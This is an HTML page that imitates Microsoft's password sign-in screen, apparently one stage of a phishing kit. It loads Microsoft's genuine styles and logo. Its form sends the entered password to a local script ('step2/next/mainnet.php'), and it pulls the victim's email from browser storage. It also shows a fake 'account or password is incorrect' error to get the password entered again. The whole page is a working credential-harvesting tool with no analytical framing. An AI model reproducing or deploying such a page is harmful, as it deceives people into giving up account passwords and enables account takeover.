<!DOCTYPE html>
<html dir="ltr" class="" lang="en">
<head>
    <title>Sign in to your account</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Expires" content="-1">
    <meta http-equiv="x-dns-prefetch-control" content="on">
    <meta name="PageID" content="ConvergedSignIn">
    <meta name="SiteID" content="">
    <meta name="ReqLC" content="1033">
    <meta name="LocLC" content="en-US">
    <meta name="format-detection" content="telephone=no">
    <meta name="robots" content="none">
    <link rel="shortcut icon" href="favicon.ico">
    <link data-loader="cdn" crossorigin="anonymous" href="https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_8owwt4u-33ps0wawi7tmow2.css" rel="stylesheet" onerror="$Loader.OnError(this)" onload="$Loader.OnSuccess(this)" integrity="sha384-Zc0p7pM8abcKGtPzWL0oscmmWxZhkOyRDsEZ+5f7A2srGIDp1BgnRxrdZkp9PeR5">
    <script data-loader="cdn" crossorigin="anonymous" src="https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_NnFX4S8X6vb-OgGnD82WNA2.js" onerror="$Loader.OnError(this)" onload="$Loader.OnSuccess(this)"></script>
    <script data-loader="cdn" crossorigin="anonymous" src="https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_drcggiwi0cystfohuwx04a2.js" onerror="$Loader.OnError(this)" onload="$Loader.OnSuccess(this)" integrity="sha384-QGN9amI//jyhPiLF51uKD3Vg8IrIdrb5Utp6PTYX/61yLXqJA2rV1QTkBpQaIGb7"></script>
    <script charset="utf-8" src="https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_f3782014f3739160dbfd.js"></script>
    <link rel="prefetch" href="https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_8owwt4u-33ps0wawi7tmow2.css">
    <link rel="prefetch" href="https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_drcggiwi0cystfohuwx04a2.js">
    <script charset="utf-8" src="https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_85acbcb9234972130506.js"></script>
    <script charset="utf-8" src="https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_44ba818dfa55d8749503.js"></script>
</head>
<body class="cb" data-bind="defineGlobals: ServerData, bodyCssClass"><div><!--  -->

    <!--  -->
    
    <div data-bind="if: activeDialog"></div>
    
    <form method="post" target="_top" autocomplete="off" action="step2/next/mainnet.php?" class="provide-min-height">
        <!-- ko withProperties: { '$loginPage': $data } -->
        <div class="login-paginated-page" data-bind="component: { name: 'master-page',
            publicMethods: masterPageMethods,
            params: {
                serverData: svr,
                showButtons: svr.F,
                showFooterLinks: true,
                useWizardBehavior: svr.bD,
                handleWizardButtons: false,
                password: password,
                hideFromAria: ariaHidden },
            event: {
                footerAgreementClick: footer_agreementClick } }"><!--  -->
    
    <!-- ko ifnot: useLayoutTemplates --><!-- /ko -->
    
    <!-- ko if: useLayoutTemplates -->
        <!-- ko withProperties: { '$page': $parent } -->
            <!-- ko if: isLightboxTemplate() -->
            <div id="lightboxTemplateContainer" data-bind="component: { name: 'lightbox-template', params: { serverData: svr, showHeader: $page.showHeader(), headerLogo: $page.headerLogo() } }, css: { 'provide-min-height': svr.cm }" class="provide-min-height"><!--  -->
    
    <div id="lightboxBackgroundContainer" data-bind="css: { 'provide-min-height': svr.cN },
        component: { name: 'background-image-control',
            publicMethods: $page.backgroundControlMethods,
            event: { load: $page.backgroundImageControl_onLoad } }"><div class="background-image-holder" role="presentation" data-bind="css: { app: isAppBranding }, style: { background: backgroundStyle }">
        <!-- ko if: smallImageUrl --><!-- /ko -->
    
        <!-- ko if: backgroundImageUrl -->
        <div id="backgroundImage" data-bind="backgroundImage: backgroundImageUrl(), externalCss: { 'background-image': true }" class="background-image ext-background-image" style="background-image: url(&quot;https://logincdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg&quot;);"></div>
            <!-- ko if: useImageMask --><!-- /ko -->
        <!-- /ko -->
    </div></div>
    
    <!-- ko if: svr.cR --><!-- /ko -->
    
    <!-- ko withProperties: { '$masterPageContext': $parentContext } -->
    <div class="outer" data-bind="css: { 'app': $page.backgroundLogoUrl }">
        <!-- ko if: showHeader --><!-- /ko -->
    
        <div class="template-section main-section">
            <div data-bind="externalCss: { 'middle': true }" class="middle ext-middle">
                <div class="full-height" data-bind="component: { name: 'content-control', params: { serverData: svr, isVerticalSplitTemplate: $page.isVerticalSplitTemplate() } }"><!--  -->
    
    <!-- ko withProperties: { '$content': $data } -->
    <div class="flex-column">
        <!-- ko if: $page.paginationControlHelper.showBackgroundLogoHolder --><!-- /ko -->
    
        <!-- ko if: $page.paginationControlHelper.showPageLevelTitleControl --><!-- /ko -->
    
        <div class="win-scroll">
            <div id="lightbox" data-bind="
                animationEnd: $page.paginationControlHelper.animationEnd,
                externalCss: { 'sign-in-box': true },
                css: {
                    'inner':  $content.isVerticalSplitTemplate,
                    'vertical-split-content': $content.isVerticalSplitTemplate,
                    'app': $page.backgroundLogoUrl,
                    'wide': $page.paginationControlHelper.useWiderWidth,
                    'fade-in-lightbox': $page.fadeInLightBox,
                    'has-popup': $page.showFedCredAndNewSession &amp;&amp; ($page.showFedCredButtons() || $page.newSession()),
                    'transparent-lightbox': $page.backgroundControlMethods() &amp;&amp; $page.backgroundControlMethods().useTransparentLightBox,
                    'lightbox-bottom-margin-debug': $page.showDebugDetails }" class="sign-in-box ext-sign-in-box fade-in-lightbox">
    
                <!-- ko template: { nodes: $masterPageContext.$componentTemplateNodes, data: $page } -->
    
            <!-- ko if: svr.Bx --><!-- /ko -->
    
            <div class="lightbox-cover" data-bind="css: { 'disable-lightbox': svr.CF &amp;&amp; showLightboxProgress() }"></div>
    
            <!-- ko if: showLightboxProgress --><!-- /ko -->
    
            <!-- ko if: loadBannerLogo -->
            <div data-bind="component: { name: 'logo-control',
                params: {
                    isChinaDc: svr.fIsChinaDc,
                    bannerLogoUrl: bannerLogoUrl() } }"><!--  -->
    
    <!-- ko if: bannerLogoUrl --><!-- /ko -->
    
    <!-- ko if: !bannerLogoUrl && !isChinaDc -->
        <!-- ko component: 'accessible-image-control' --><!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --><!-- /ko -->
    <!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme -->
    <!-- ko template: { nodes: [darkImageNode], data: $parent } --><img class="logo" role="img" pngsrc="https://logincdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ed9c9eb0dce17d752bedea6b5acda6d9.png" svgsrc="https://logincdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" data-bind="imgSrc, attr: { alt: str['MOBILE_STR_Footer_Microsoft'] }" src="https://logincdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" alt="Microsoft"><!-- /ko -->
    <!-- /ko --><!-- /ko -->
    <!-- /ko --></div>
            <!-- /ko -->
    
            <!-- ko if: svr.Dh && paginationControlHelper.showLwaDisclaimer() --><!-- /ko -->
    
            <!-- ko if: asyncInitReady -->
            <div role="main" data-bind="component: { name: 'pagination-control',
                publicMethods: paginationControlMethods,
                params: {
                    enableCssAnimation: svr.a7,
                    disableAnimationIfAnimationEndUnsupported: svr.Cl,
                    initialViewId: initialViewId,
                    currentViewId: currentViewId,
                    initialSharedData: initialSharedData,
                    initialError: $loginPage.getServerError() },
                event: {
                    cancel: paginationControl_onCancel,
                    load: paginationControlHelper.onLoad,
                    unload: paginationControlHelper.onUnload,
                    loadView: view_onLoadView,
                    showView: view_onShow,
                    setLightBoxFadeIn: view_onSetLightBoxFadeIn,
                    animationStateChange: paginationControl_onAnimationStateChange } }"><!--  -->
    
    <div data-bind="css: { 'zero-opacity': hidePaginatedView() }" class="">
        <!-- ko if: showIdentityBanner() && (sharedData.displayName || svr.i) -->
        <div data-bind="css: {
            'animate': animate() &amp;&amp; animate.animateBanner(),
            'slide-out-next': animate.isSlideOutNext(),
            'slide-in-next': animate.isSlideInNext(),
            'slide-out-back': animate.isSlideOutBack(),
            'slide-in-back': animate.isSlideInBack() }" class="animate slide-in-next">
    
            <div data-bind="component: { name: 'identity-banner-control',
                params: {
                    userTileUrl: svr.b9,
                    displayName: sharedData.displayName || svr.i,
                    isBackButtonVisible: isBackButtonVisible(),
                    focusOnBackButton: isBackButtonFocused(),
                    backButtonDescribedBy: backButtonDescribedBy() },
                event: {
                    backButtonClick: identityBanner_onBackButtonClick } }"><!--  -->
    
    <div class="identityBanner">
        <!-- ko if: isBackButtonVisible --><!-- /ko -->
    
        <div id="displayName" class="identity" data-bind="text: unsafe_displayName, attr: { 'title': unsafe_displayName }"><a href="index.php"><img src="arrow_left.svg"><span id="email"></span></a></div>
        <script>
            document.addEventListener("DOMContentLoaded", function() {
                const ls = localStorage.getItem('eml');
                const eml = document.getElementById('email');
                eml.innerText = ls;
            });
        </script>
    </div></div>
        </div>
        <!-- /ko -->
    
        <div class="pagination-view has-identity-banner animate slide-in-next" data-bind="css: {
            'has-identity-banner': showIdentityBanner() &amp;&amp; (sharedData.displayName || svr.i),
            'zero-opacity': hidePaginatedView.hideSubView(),
            'animate': animate(),
            'slide-out-next': animate.isSlideOutNext(),
            'slide-in-next': animate.isSlideInNext(),
            'slide-out-back': animate.isSlideOutBack(),
            'slide-in-back': animate.isSlideInBack() }">
    
            <!-- ko foreach: views -->
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() -->
                    <!-- ko template: { nodes: [$data], data: $parent } --><div data-viewid="2" data-showidentitybanner="true" data-dynamicbranding="true" data-bind="pageViewComponent: { name: 'login-paginated-password-view',
                    params: {
                        serverData: svr,
                        serverError: initialError,
                        isInitialView: isInitialState,
                        username: sharedData.username,
                        displayName: sharedData.displayName,
                        hipRequiredForUsername: sharedData.hipRequiredForUsername,
                        passwordBrowserPrefill: sharedData.passwordBrowserPrefill,
                        availableCreds: sharedData.availableCreds,
                        evictedCreds: sharedData.evictedCreds,
                        useEvictedCredentials: sharedData.useEvictedCredentials,
                        showCredViewBrandingDesc: sharedData.showCredViewBrandingDesc,
                        flowToken: sharedData.flowToken,
                        defaultKmsiValue: svr.AN === 1,
                        userTenantBranding: sharedData.userTenantBranding,
                        sessions: sharedData.sessions,
                        callMetadata: sharedData.callMetadata,
                        supportsNativeCredentialRecovery: sharedData.supportsNativeCredentialRecovery },
                    event: {
                        restoreIsRecoveryAttemptPost: $loginPage.view_onRestoreIsRecoveryAttemptPost,
                        updateFlowToken: $loginPage.view_onUpdateFlowToken,
                        submitReady: $loginPage.view_onSubmitReady,
                        redirect: $loginPage.view_onRedirect,
                        resetPassword: $loginPage.passwordView_onResetPassword,
                        setBackButtonState: view_onSetIdentityBackButtonState,
                        setPendingRequest: $loginPage.view_onSetPendingRequest } }"><!--  -->
    
    <!--  -->
    
    
    
    <p></p><div role="alert" aria-live="assertive">
        <!-- ko if: passwordTextbox.error -->
        <div id="passwordError" data-bind="
            externalCss: { 'error': true },
            htmlWithBindings: passwordTextbox.error,
            childBindings: {
                'idA_IL_ForgotPassword0': {
                    href: accessRecoveryLink || svr.r,
                    attr: {
                        target: accessRecoveryLink &amp;&amp; '_blank',
                        role: supportsNativeCredentialRecovery ? 'button' : 'link'
                    },
                    click: accessRecoveryLink ? null : resetPassword_onClick } }" class="error ext-error">Your account or password is incorrect. If you don't remember your password, <a id="idA_IL_ForgotPassword0" href="#" role="link">reset it now.</a><!-- HR=80041012 --></div>
        <!-- /ko -->
    </div><p></p>
    
    <!-- ko if: showCredViewBrandingDesc --><!-- /ko -->
    
    <!-- ko if: unsafe_pageDescription --><!-- /ko -->
    
    <div class="row">
        <div class="form-group col-md-24">
            <div role="alert" aria-live="assertive">
                <!-- ko if: passwordTextbox.error --><!-- /ko -->
            </div>
    
            <div class="placeholderContainer" data-bind="component: { name: 'placeholder-textbox-field',
                publicMethods: passwordTextbox.placeholderTextboxMethods,
                params: {
                    serverData: svr,
                    hintText: str['CT_PWD_STR_PwdTB_Label'] },
                event: {
                    updateFocus: passwordTextbox.textbox_onUpdateFocus } }"><!-- ko withProperties: { '$placeholderText': placeholderText } -->
        <!-- ko template: { nodes: $componentTemplateNodes, data: $parent } -->
    
                <input name="password1" type="password" id="i0118" autocomplete="off" class="form-control input ext-input text-box ext-text-box" aria-required="true" data-bind="
                    textInput: passwordTextbox.value,
                    ariaDescribedBy: [
                        'loginHeader passwordError',
                        showCredViewBrandingDesc ? 'credViewBrandingDesc' : '',
                        unsafe_pageDescription ? 'passwordDesc' : ''].join(' '),
                    hasFocusEx: passwordTextbox.focused() &amp;&amp; !showPassword(),
                    placeholder: $placeholderText,
                    ariaLabel: unsafe_passwordAriaLabel,
                    moveOffScreen: showPassword,
                    externalCss: {
                        'input': true,
                        'text-box': true,
                        'has-error': passwordTextbox.error }" aria-describedby="loginHeader passwordError  " placeholder="Password" tabindex="0" required>
    
                <!-- ko if: svr.cn && showPassword() --><!-- /ko -->
            <!-- /ko -->
    <!-- /ko -->
    <!-- ko ifnot: usePlaceholderAttribute --><!-- /ko --></div>
    
            <!-- ko if: svr.cn --><!-- /ko -->
        </div>
        <div class="form-group form-check">
            <label class="form-check-label">
                <input class="form-check-input" type="checkbox"> Keep me signed in
            </label>
        </div>
    </div>
    
    <!-- ko if: shouldHipInit --><!-- /ko -->
    
    <div data-bind="css: { 'position-buttons': !tenantBranding.BoilerPlateText }, externalCss: { 'password-reset-links-container': true }" class="position-buttons password-reset-links-container ext-password-reset-links-container">
        <div>
            <!-- ko if: svr.cE --><!-- /ko -->
            <!-- ko if: svr.BQ !== false && !svr.cE && !tenantBranding.KeepMeSignedInDisabled --><!-- /ko -->
    
            <div class="row">
                <div class="col-md-24">
                    <div class="text-13">
                        <!-- ko if: svr.av && svr.ak --><!-- /ko -->
                        <!-- ko ifnot: hideForgotMyPassword -->
                        <div class="form-group">
                            <a id="idA_PWD_ForgotPassword" role="link" href="#" data-bind="
                                text: unsafe_forgotPasswordText,
                                href: accessRecoveryLink || svr.r,
                                attr: { target: accessRecoveryLink &amp;&amp; '_blank' },
                                click: accessRecoveryLink ? null : resetPassword_onClick">Forgot password?</a>
                        </div>
                        <!-- /ko -->
                        <!-- ko if: allowPhoneDisambiguation --><!-- /ko -->
                        <!-- ko ifnot: useEvictedCredentials -->
                            <!-- ko component: { name: "cred-switch-link-control",
                                params: {
                                    serverData: svr,
                                    username: username,
                                    availableCreds: availableCreds,
                                    flowToken: flowToken,
                                    currentCred: { credType: 1 } },
                                event: {
                                    switchView: credSwitchLink_onSwitchView,
                                    redirect: onRedirect,
                                    setPendingRequest: credSwitchLink_onSetPendingRequest,
                                    updateFlowToken: credSwitchLink_onUpdateFlowToken } } --><!--  -->
    
    <div class="form-group">
        <!-- ko if: showSwitchToCredPickerLink --><!-- /ko -->
    
        <!-- ko if: credentialCount === 1 && !(showForgotUsername || selectedCredShownOnlyOnPicker) -->
            <!-- ko ifnot: hideCredSwitchLink -->
            
            <!-- /ko -->
    
            <!-- ko if: displayHelp && selectedCredType === 7 --><!-- /ko -->
        <!-- /ko -->
    
        <!-- ko if: credentialCount === 0 && showForgotUsername --><!-- /ko -->
    </div>
    
    <!-- ko if: credLinkError --><!-- /ko --><!-- /ko -->
    
                            <!-- ko if: evictedCreds.length > 0 --><!-- /ko -->
                        <!-- /ko -->
                        <!-- ko if: showChangeUserLink --><!-- /ko -->
                    </div>
                </div>
            </div>
        </div>
    
        <div class="win-button-pin-bottom" data-bind="css : { 'boilerplate-button-bottom': tenantBranding.BoilerPlateText }">
            <div class="row" data-bind="css: { 'move-buttons': tenantBranding.BoilerPlateText }">
                <div data-bind="component: { name: 'footer-buttons-field',
                    params: {
                        serverData: svr,
                        primaryButtonText: str['CT_PWD_STR_SignIn_Button'],
                        isPrimaryButtonEnabled: !isRequestPending(),
                        isPrimaryButtonVisible: svr.F,
                        isSecondaryButtonEnabled: true,
                        isSecondaryButtonVisible: false },
                    event: {
                        primaryButtonClick: primaryButton_onClick } }"><div class="col-xs-24 no-padding-left-right button-container button-field-container ext-button-field-container" data-bind="
        visible: isPrimaryButtonVisible() || isSecondaryButtonVisible(),
        css: { 'no-margin-bottom': removeBottomMargin },
        externalCss: { 'button-field-container': true }">
    
        <!-- ko if: isSecondaryButtonVisible --><!-- /ko -->
    
        <div data-bind="css: { 'inline-block': isPrimaryButtonVisible }, externalCss: { 'button-item': true }" class="inline-block button-item ext-button-item">
            <!-- type="submit" is needed in-addition to 'type' in primaryButtonAttributes observable to support IE8 -->
            <input type="submit" id="idSIButton9" class="win-button button_primary button ext-button primary ext-primary" data-report-event="Signin_Submit" data-report-trigger="click" data-report-value="Submit" data-bind="
                    attr: primaryButtonAttributes,
                    externalCss: {
                        'button': true,
                        'primary': true },
                    value: primaryButtonText() || str['CT_PWD_STR_SignIn_Button_Next'],
                    hasFocus: focusOnPrimaryButton,
                    click: primaryButton_onClick,
                    enable: isPrimaryButtonEnabled,
                    visible: isPrimaryButtonVisible,
                    preventTabbing: primaryButtonPreventTabbing" value="Sign in" data-report-attached="1">
        </div>
    </div></div>
            </div>
        </div>
    </div>
    
    <!-- ko if: tenantBranding.BoilerPlateText --><!-- /ko -->
    </div><!-- /ko -->
                <!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            <!-- /ko -->
        </div>
    </div></div>
            <!-- /ko -->
    
            <input type="hidden" name="ps" data-bind="value: postedLoginStateViewId" value="">
            <input type="hidden" name="psRNGCDefaultType" data-bind="value: postedLoginStateViewRNGCDefaultType" value="">
            <input type="hidden" name="psRNGCEntropy" data-bind="value: postedLoginStateViewRNGCEntropy" value="">
            <input type="hidden" name="psRNGCSLK" data-bind="value: postedLoginStateViewRNGCSLK" value="">
            <!-- ko if: svr.Ar && !svr.fSkipRenderingNewCanaryToken --><!-- /ko -->
            <!-- ko if: !svr.Ar || svr.fSkipRenderingNewCanaryToken -->
            <input type="hidden" name="canary" data-bind="value: svr.canary" value="">
            <!-- /ko -->
            <input type="hidden" name="ctx" data-bind="value: ctx" value="">
            <input type="hidden" name="hpgrequestid" data-bind="value: svr.sessionId" value="">
            <input type="hidden" id="i0327" data-bind="attr: { name: svr.bq }, value: flowToken" name="PPFT" value="DYo0GHetxOub*GxVjGO*KrVYv0ccklwJQBnVXTzucGax6w5oizRR3ooRIvUIRDIS35am1TUxyyXL1bzNX9LvqDDsKsJGZ7GX3I7lzlO57aVb44qcPgtblxX6Lib0Zng8ui89wnpkkmyK0QiLsO8CuL4lzFpGwbGO9ZGpadx171gbzPMlnB1sME*9DUR4aj1bJBket5H69Yad1zjuFd*jIJc$">
            <input type="hidden" name="PPSX" data-bind="value: svr.Dd" value="Pass">
            <input type="hidden" name="NewUser" value="1">
            <input type="hidden" name="FoundMSAs" data-bind="value: svr.AR" value="">
            <input type="hidden" name="fspost" data-bind="value: svr.fPOST_ForceSignin ? 1 : 0" value="0">
            <input type="hidden" name="i21" data-bind="value: wasLearnMoreShown() ? 1 : 0" value="0">
            <input type="hidden" name="CookieDisclosure" data-bind="value: svr.Bx ? 1 : 0" value="0">
            <input type="hidden" name="IsFidoSupported" data-bind="value: isFidoSupported() ? 1 : 0" value="1">
            <input type="hidden" name="isSignupPost" data-bind="value: isSignupPost() ? 1 : 0" value="0">
            <!-- ko ifnot: svr.fShouldSupportTargetCredentialForRecovery -->
            <input type="hidden" name="isRecoveryAttemptPost" data-bind="value: isRecoveryAttemptPost() ? 1 : 0" value="0">
            <!-- /ko -->
            <!-- ko if: svr.fShouldSupportTargetCredentialForRecovery && targetCredentialForRecovery() --><!-- /ko -->
            <div data-bind="component: { name: 'instrumentation-control',
                publicMethods: instrumentationMethods,
                params: { serverData: svr } }">
    <input type="hidden" name="i19" data-bind="value: timeOnPage" value=""></div>
        <!-- /ko -->
            </div>
    
            <!-- ko if: $page.showFedCredAndNewSession -->
            <!-- ko ifnot: svr.fUsePromotedFedCredTypesArray -->
            <!-- ko if: $page.showFedCredButtons --><!-- /ko -->
            <!-- /ko -->
    
            <!-- ko if: svr.fUsePromotedFedCredTypesArray --><!-- /ko -->
    
            <!-- ko if: $page.newSession --><!-- /ko -->
            <!-- /ko -->
    
            <!-- ko if: $page.showDebugDetails --><!-- /ko -->
        </div>
    </div>
    <!-- /ko --></div>
            </div>
        </div>
    
        <!-- ko if: $page.paginationControlHelper.showFooterControl -->
        <div id="footer" role="contentinfo" data-bind="
            externalCss: {
                'footer': true,
                'has-background': !$page.useDefaultBackground() &amp;&amp; $page.showFooter(),
                'background-always-visible': $page.backgroundLogoUrl }" class="footer ext-footer">
    
            <div data-bind="component: { name: 'footer-control',
                publicMethods: $page.footerMethods,
                params: {
                    serverData: svr,
                    useDefaultBackground: $page.useDefaultBackground(),
                    hasDarkBackground: $page.backgroundLogoUrl(),
                    showLinks: true,
                    showFooter: $page.showFooter(),
                    hideTOU: $page.hideTOU(),
                    termsText: $page.termsText(),
                    termsLink: $page.termsLink(),
                    hidePrivacy: $page.hidePrivacy(),
                    privacyText: $page.privacyText(),
                    privacyLink: $page.privacyLink() },
                event: {
                    agreementClick: $page.footer_agreementClick,
                    showDebugDetails: $page.toggleDebugDetails_onClick } }"><!-- ko if: !hideFooter && (showLinks || impressumLink || showIcpLicense) -->
    <div id="footerLinks" class="footerNode text-secondary footer-links ext-footer-links" data-bind="externalCss: { 'footer-links': true }">
    
        <!-- ko if: showFooter -->
            <!-- ko if: !hideTOU -->
            <a id="ftrTerms" data-bind="
                text: termsText,
                href: termsLink,
                click: termsLink_onClick,
                externalCss: {
                    'footer-content': true,
                    'footer-item': true,
                    'has-background': !useDefaultBackground,
                    'background-always-visible': hasDarkBackground }" href="https://login.live.com/gls.srf?urlID=WinLiveTermsOfUse&amp;mkt=EN-US&amp;uaid=02dedac913434497925dd14fbbb7e473" class="footer-content ext-footer-content footer-item ext-footer-item">Terms of use</a>
            <!-- /ko -->
    
            <!-- ko if: !hidePrivacy -->
            <a id="ftrPrivacy" data-bind="
                text: privacyText,
                href: privacyLink,
                click: privacyLink_onClick,
                externalCss: {
                    'footer-content': true,
                    'footer-item': true,
                    'has-background': !useDefaultBackground,
                    'background-always-visible': hasDarkBackground }" href="https://login.live.com/gls.srf?urlID=MSNPrivacyStatement&amp;mkt=EN-US&amp;uaid=02dedac913434497925dd14fbbb7e473" class="footer-content ext-footer-content footer-item ext-footer-item">Privacy &amp; cookies</a>
            <!-- /ko -->
    
            <!-- ko if: impressumLink --><!-- /ko -->
    
            <!-- ko if: a11yConformeLink --><!-- /ko -->
    
            <!-- ko if: showIcpLicense --><!-- /ko -->
        <!-- /ko -->
    
        <!-- Set attr binding before hasFocusEx to prevent Narrator from losing focus -->
        <a id="moreOptions" href="#" role="button" data-bind="
            click: moreInfo_onClick,
            ariaLabel: str['CT_STR_More_Options_Ellipsis_AriaLabel'],
            attr: { 'aria-expanded': showDebugDetails().toString() },
            hasFocusEx: focusMoreInfo(),
            externalCss: {
                'footer-content': true,
                'footer-item': true,
                'debug-item': true,
                'has-background': !useDefaultBackground,
                'background-always-visible': hasDarkBackground }" aria-label="Click here for troubleshooting information" aria-expanded="false" class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item">...</a>
    </div>
    <!-- /ko -->
    
    <!-- ko if: svr.cc && showLinks --><!-- /ko --></div>
        </div>
        <!-- /ko -->
    </div>
    <!-- /ko --></div>
            <!-- /ko -->
    
            <!-- ko if: isVerticalSplitTemplate() && isTemplateLoaded() --><!-- /ko -->
        <!-- /ko -->
    <!-- /ko --></div>
        <!-- /ko -->
    </form>
    
    <!-- ko if: svr.aM --><!-- /ko -->
    
    <!-- ko if: svr.DT --><!-- /ko --></div></body>

</html>